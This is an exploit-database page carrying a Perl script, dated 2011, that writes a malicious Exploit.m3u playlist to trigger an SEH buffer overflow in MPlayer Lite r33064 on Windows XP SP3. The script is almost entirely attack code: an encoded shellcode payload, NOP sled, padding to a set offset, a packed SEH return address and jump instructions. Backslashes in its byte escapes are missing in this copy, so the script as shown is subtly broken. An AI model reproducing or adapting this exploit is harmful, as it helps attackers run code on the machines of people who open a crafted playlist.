[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MPlayer Lite r33064 m3u SEH Overflow Exploit
# Published : 2011-03-20
# Author : C4SS!0 and h1ch4m
# Previous Title : ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)
# Next Title : Mediacoder 2011 RC3 m3u Buffer Overflow Exploit
#!/usr/bin/perl
#
#[+]Exploit Title: Exploit Buffer Overflow Msplayer(SEH)
#[+]Date: 19 32011
#[+]Author: C4SS!0 and h1ch4m
#[+]Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayer_Release/Revision%2033064/mplayer_lite_r33064.7z/download
#[+]Version: Lite 33064
#[+]Tested On: WIN-XP SP3
#[+]CVE: N/A
#
#Created BY C4SS!0 And h1ch4m
#C4SS!0: E-mail Louredo_@hotmail.com
#h1ch4m: E-mail h1ch4m@live.fr
#
#
use strict;
use warnings;
use IO::File;
print q
{
Created BY C4SS!0 And h1ch4m
Site www.exploit-br.org
E-mail Louredo_@hotmail.com
};
sleep(2);
print "tt[+]Creating File Exploit.m3unn";
sleep(1);
my $shellcode =
"xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";
my $buf = "x90" x 100;
$buf .= $shellcode;
$buf .= "x41" x (5152-length($buf));;
$buf .= "xebx0fxccxcc";
$buf .= pack('V',0x6B04FCDE);
$buf .= "x90" x 15;
$buf .= "xE9xD4xEBxFFxFF";
$buf .= "x90" x 400;
open(my $FILE,">Exploit.m3u") || die "**[x]Error:n$!n";
print $FILE "http:// ".$buf;
close($FILE);
print "tt[+]File Created With Sucessnn";
sleep(3);